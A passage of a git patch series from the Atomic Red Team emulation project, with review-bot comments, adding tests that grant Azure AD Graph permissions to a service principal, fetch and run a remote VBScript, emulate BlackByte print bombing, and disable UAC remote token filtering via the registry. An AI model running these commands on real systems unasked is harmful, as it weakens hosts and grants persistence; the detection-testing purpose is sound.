+ }
+ else
+ {
+ Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
+ }
+
+ #Add required resource accesses
+ $requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
+ $requiredResourcesAccess.Add($requiredGraphAccess)
+
+ #Set permissions in existing Azure AD App
+ Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess
+
+ $servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}
+
+ New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id
+
+ cleanup_command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ Connect-AzureAD -Credential $Credential
+
+ $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+ Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
+
+ name: powershell
+ elevation_required: false
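Review bot: The `description` of the new test is a copy-paste from the preceding Azure role test and stops mid-sentence (`... also called Azure resource role. Threat actor`), so it does not describe what this executor does; the intended wording is the one in the T1098.md hunk of the same commit, and because the markdown is regenerated from this YAML the truncated text will overwrite it. In the executor's `else` branch `$permission` is never assigned (the variable set above is `$ApplicationPermissions`) and the branch does not stop the script, so `New-AzureADServiceAppRoleAssignment` still runs with an empty `-Id $reqPermission.Id`; suggest `Write-Host "App permission $ApplicationPermissions not found in the Graph Resource API" -ForegroundColor Red; exit 1`, and the same fix applies to the copy of the script in T1098.md. `description: Name of the targed application` has a typo (`targeted`). The cleanup removes only the application registration; whether that also removes the service principal created by `New-AzureADServicePrincipal` and its role assignment should be confirmed, since otherwise a principal holding the granted Graph permission is left behind after the test.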
From eb50e5b1e033dc7c5abac50ae5f6fb0266955235 Mon Sep 17 00:00:00 2001 From: WojciechLesicki Date: Sun, 6 Mar 2022 18:59:52 +0100 Subject: [PATCH 05/83] Adding new lines --- atomics/T1098/T1098.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index e7d4a010..4b3c7a24 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -516,10 +516,10 @@ The account you use to run the PowerShell command should have Global Administrat Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs. You can also take a look at the materials: -https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/ -https://github.com/reprise99/Sentinel-Queries -https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766 -https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb +https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
+https://github.com/reprise99/Sentinel-Queries
+https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
+https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
**Supported Platforms:** Azure-ad From 54f98b99300ec05a6c98e6b37922119ff847c716 Mon Sep 17 00:00:00 2001 From: WojciechLesicki Date: Sun, 6 Mar 2022 19:15:00 +0100 Subject: [PATCH 06/83] Added one more newline :) --- atomics/T1098/T1098.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index 4b3c7a24..443738d5 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -515,7 +515,7 @@ The DirectoryRecommendations.Read.All permissions have been selected as the defa The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD. Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs. -You can also take a look at the materials: +You can also take a look at the materials:
https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
https://github.com/reprise99/Sentinel-Queries
https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
From 999d18a36d0719b6b661b8c3e880fe18444d2f07 Mon Sep 17 00:00:00 2001 From: lucasRiley <70220074+lucasRiley@users.noreply.github.com> Date: Mon, 7 Mar 2022 10:38:41 -0600 Subject: [PATCH 07/83] T1059.005 Fix Cleanup and Prereq (#1798) Co-authored-by: Riley
---
atomics/T1059.005/T1059.005.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml
index 3425d472..283e87dd 100644
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -19,13 +19,11 @@ atomic_tests:
 - description: Sample script must exist on disk at specified location (#{vbscript})
 prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1}
 '
 get_prereq_command: |-
- Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
 New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
- Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+ Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
 executor:
 command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
 cleanup_command: |-
- Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
 Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
 name: powershell
From c81858120bdcef3c034bdc5f23ff336df8f176aa Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 7 Mar 2022 16:39:15 +0000 Subject: [PATCH 08/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
atomics/Indexes/index.yaml | 7 ++----- atomics/T1059.005/T1059.005.md | 4 +--- 2 files changed, 3 insertions(+), 8 deletions(-)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3f4028e3..d12ebc5f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
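Review bot: The new `get_prereq_command` quotes the download target (`-OutFile "#{vbscript}"`) while the unchanged `Test-Path #{vbscript}`, `Split-Path #{vbscript}` and `cscript #{vbscript}` in the same test leave the path unquoted, so a value containing a space passes or fails differently between the prerequisite check and the fetch; quoting all four consistently would be cleaner. The script is fetched from a `master` raw URL and then executed by `cscript`, so what runs is whatever that path holds at run time; pinning the URL to a commit, or comparing the downloaded file against an expected hash before it is executed, would make the test reproducible and its behaviour reviewable. The same quoting inconsistency is carried into the generated index.yaml and T1059.005.md copies further down.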
@@ -66538,14 +66538,11 @@ execution: - description: Sample script must exist on disk at specified location (#{vbscript}) prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} ' get_prereq_command: |- - Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs" New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null - Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force + Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}" executor: command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt' - cleanup_command: |- - Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore - Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore + cleanup_command: Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore name: powershell - name: Encoded VBS code execution auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index d81a0599..e69abb22 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -46,7 +46,6 @@ cscript #{vbscript} > $env:TEMP\T1059.005.out.txt #### Cleanup Commands: ```powershell -Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore ``` 
@@ -60,9 +59,8 @@ if (Test-Path #{vbscript}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell -Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs" New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null -Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force +Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}" ``` From 5388982089e25ad30c8e9285b7195f2b69982b8a Mon Sep 17 00:00:00 2001 From: Leo Verlod <96517806+Leomon5@users.noreply.github.com> Date: Mon, 7 Mar 2022 11:18:20 -0600 Subject: [PATCH 09/83] Adding T1059.003 Test 4 - BlackByte Print Bombing (#1799) Adding T1059.003 Test 4, which is designed to emulate the print bombing behavior observed in recent BlackByte ransomware attacks. Co-authored-by: Carrie Roberts --- atomics/T1059.003/T1059.003.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index db254e43..3ef2947a 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml 
@@ -71,3 +71,33 @@ atomic_tests:
 command: |
 %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
 name: command_prompt
+- name: Simulate BlackByte Ransomware Print Bombing
+ description: |
+ This test attempts to open a file a specified number of times in Wordpad, then prints the contents.
+ It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed.
+ See https://redcanary.com/blog/blackbyte-ransomware/.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_to_print:
+ description: File to be opened/printed by Wordpad.
+ type: String
+ default: $env:temp\T1059_003note.txt
+ max_to_print:
+ description: The maximum number of Wordpad windows the test will open/print.
+ type: String
+ default: 75
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ File to print must exist on disk at specified location (#{file_to_print})
+ prereq_command: |
+ if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+ get_prereq_command: |
+ new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null
+ executor:
+ command: |
+ cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
+ cleanup_command: |
+ stop-process -name wordpad -force -erroraction silentlycontinue
+ name: powershell
From a38b68f06789e4b5edb00f85e7badb17f4303285 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 7 Mar 2022 17:18:39 +0000 Subject: [PATCH 10/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
--- atomics/T1059.003/T1059.003.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+)
diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml
index 3ef2947a..b3dacb8e 100644
--- a/atomics/T1059.003/T1059.003.yaml
+++ b/atomics/T1059.003/T1059.003.yaml
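Review bot: Each pass of the `for /l` loop in the executor submits a real print job to the default printer, and the cleanup only stops Wordpad, so on a host whose default printer is a physical device this prints `#{max_to_print}` pages and leaves anything still spooled in the queue after the test. The description should warn about that (`WARNING: sends #{max_to_print} print jobs to the default printer; run only where the default printer is virtual or absent`) and the cleanup should also drain the queue, e.g. `Get-PrintJob -PrinterName (Get-CimInstance Win32_Printer -Filter "Default=TRUE").Name -ErrorAction SilentlyContinue | Remove-PrintJob` (needs the PrintManagement module, present on supported Windows versions). `#{file_to_print}` is also passed unquoted to `start wordpad.exe /p`, so a path containing spaces is split into two arguments; quote it, remembering that `start` treats a leading quoted token as the window title and needs the form `start "" wordpad.exe /p "<path>"` (with the inner quotes escaped for the PowerShell string). `max_to_print` is declared `type: String` but is only used as a numeric loop bound, so if the schema permits it, `type: Integer` would reject non-numeric input before it reaches `cmd`.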
@@ -72,6 +72,7 @@ atomic_tests: %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} name: command_prompt - name: Simulate BlackByte Ransomware Print Bombing + auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 description: | This test attempts to open a file a specified number of times in Wordpad, then prints the contents. It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 9ae01810..eb5a741a 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -881,3 +881,4 @@ c59f246a-34f8-4e4d-9276-c295ef9ba0dd 5fc528dd-79de-47f5-8188-25572b7fafe0 e895677d-4f06-49ab-91b6-ae3742d0a2ba 35eb8d16-9820-4423-a2a1-90c4f5edd9ca +6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 From 7dd9d481b55e380d2ea5b2229e294811c8cfac11 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 7 Mar 2022 17:18:44 +0000 Subject: [PATCH 11/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 39 ++++++++++++++ atomics/T1059.003/T1059.003.md | 54 +++++++++++++++++++ 6 files changed, 97 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 73650152..cfb6798c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -971,6 +971,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt +execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 3a1e2069..2fa6001e 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -687,6 +687,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt +execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index ff1fcce3..13ee0894 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1623,6 +1623,7 @@ - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] + - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index ec79cb1c..d4fc8630 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -1166,6 +1166,7 @@ - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] + - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d12ebc5f..3e57761d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -66745,6 +66745,45 @@ execution: command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}\n" name: command_prompt + - name: Simulate BlackByte Ransomware Print Bombing + auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 + description: "This test attempts to open a file a specified number of times + in Wordpad, then prints the contents. \nIt is designed to mimic BlackByte + ransomware's print bombing technique, where tree.dll, which contains the ransom + note, is opened in Wordpad 75 times and then printed. \nSee https://redcanary.com/blog/blackbyte-ransomware/. + \n" + supported_platforms: + - windows + input_arguments: + file_to_print: + description: File to be opened/printed by Wordpad. + type: String + default: "$env:temp\\T1059_003note.txt" + max_to_print: + description: The maximum number of Wordpad windows the test will open/print. + type: String + default: 75 + dependency_executor_name: powershell + dependencies: + - description: 'File to print must exist on disk at specified location (#{file_to_print}) + +' + prereq_command: 'if (test-path "#{file_to_print}"){exit 0} else {exit 1} + +' + get_prereq_command: 'new-item #{file_to_print} -value "This file has been + created by T1059.003 Test 4" -Force | Out-Null + +' + executor: + command: 'cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe + /p #{file_to_print}" | out-null + +' + cleanup_command: 'stop-process -name wordpad -force -erroraction silentlycontinue + +' + name: powershell T1047: technique: id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 622de096..350636eb 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md 
@@ -14,6 +14,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu - [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell) +- [Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing](#atomic-test-4---simulate-blackbyte-ransomware-print-bombing) +
@@ -137,4 +139,56 @@ Command line executed via suspicious invocation. Example is from the 2021 Threat +
+
+ +## Atomic Test #4 - Simulate BlackByte Ransomware Print Bombing +This test attempts to open a file a specified number of times in Wordpad, then prints the contents. +It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed. +See https://redcanary.com/blog/blackbyte-ransomware/. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_to_print | File to be opened/printed by Wordpad. | String | $env:temp\T1059_003note.txt| +| max_to_print | The maximum number of Wordpad windows the test will open/print. | String | 75| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null +``` + +#### Cleanup Commands: +```powershell +stop-process -name wordpad -force -erroraction silentlycontinue +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: File to print must exist on disk at specified location (#{file_to_print}) +##### Check Prereq Commands: +```powershell +if (test-path "#{file_to_print}"){exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +new-item #{file_to_print} -value "This file has been created by T1059.003 Test 4" -Force | Out-Null +``` + + + +
From 43fa5fb8a06a401079a89c2dcd395cca17fcb73a Mon Sep 17 00:00:00 2001 From: SecWilson <47117894+SecWilson@users.noreply.github.com> Date: Mon, 7 Mar 2022 11:33:31 -0600 Subject: [PATCH 12/83] Blackbyte privilege escalation via Powershell (#1796) Co-authored-by: Wilson Co-authored-by: Carrie Roberts --- atomics/T1112/T1112.yaml | 24 +++++++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 48c7f4bd..8728e16f 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -132,4 +132,26 @@ atomic_tests: reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1 name: command_prompt elevation_required: true - +- name: BlackByte Ransomware Registry Changes - Powershell + description: | + This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell. See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/ + The steps are as follows: +
    +
  1. 1. Elevate Local Privilege by disabling UAC Remote Restrictions
  2. +
  3. 2. Enable OS to share network connections between different privilege levels
  4. +
  5. 3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths
  6. +
+ The registry keys and their respective values will be created upon successful execution. + supported_platforms: + - windows + executor: + command: | + New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force + New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force + New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force + cleanup_command: | + Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force + Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force + Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force + name: powershell + elevation_required: true From 03c3400af98646923ea6ea28050d6276f8031bf6 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 7 Mar 2022 17:34:02 +0000 Subject: [PATCH 13/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1112/T1112.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 8728e16f..0f10ccb5 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -133,6 +133,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: BlackByte Ransomware Registry Changes - Powershell + auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d description: | This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell. See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/ The steps are as follows: 
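Review bot: The cleanup deletes `LocalAccountTokenFilterPolicy`, `EnableLinkedConnections` and `LongPathsEnabled` unconditionally, so on a host where any of them was already set (by Group Policy or an earlier hardening step) the test ends by removing that configuration rather than restoring it, and because `New-ItemProperty -Force` overwrites silently the executor gives no hint that a value pre-existed. Since the executor and `cleanup_command` run as separate invocations, record the prior state to disk before changing it, e.g. `Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" | Export-Clixml "$env:TEMP\T1112_policies_system.xml"` (and likewise for the `FileSystem` key), then have the cleanup `Import-Clixml` it and `Set-ItemProperty` each value that was present while removing only those that were absent. Step 1 of the description also overstates the effect: `LocalAccountTokenFilterPolicy = 1` does not elevate a local privilege, it disables UAC remote token filtering so local administrator accounts receive a full token over the network, which appears to be the lateral-movement enabler the linked "Preparing to Worm" section refers to; `1. Disable UAC remote restrictions (LocalAccountTokenFilterPolicy) so local admin accounts get full tokens over the network` would be more accurate.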
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index eb5a741a..5c8dfb49 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -882,3 +882,4 @@ c59f246a-34f8-4e4d-9276-c295ef9ba0dd e895677d-4f06-49ab-91b6-ae3742d0a2ba 35eb8d16-9820-4423-a2a1-90c4f5edd9ca 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 +0b79c06f-c788-44a2-8630-d69051f1123d From 682d8d732bae56e8f7906027ae622013629cb368 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 7 Mar 2022 17:34:07 +0000 Subject: [PATCH 14/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 24 ++++++++++ atomics/T1112/T1112.md | 45 +++++++++++++++++++ 6 files changed, 73 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index cfb6798c..1e582b39 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -474,6 +474,7 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt +defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 2fa6001e..25300732 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -306,6 +306,7 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt +defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md 